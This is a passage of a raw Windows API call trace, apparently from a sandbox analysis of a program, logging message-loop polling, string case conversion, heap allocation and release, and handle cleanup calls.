returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.785] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.785] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.786] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.786] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.786] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.786] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.786] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.786] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.786] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.786] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.786] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.786] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.786] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.786] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.787] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.787] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.789] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.790] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.791] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.791] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.791] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.792] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.792] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.792] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.792] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.792] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.793] CloseHandle (hObject=0x268) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.797] CloseHandle (hObject=0x294) returned 1 [0188.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | 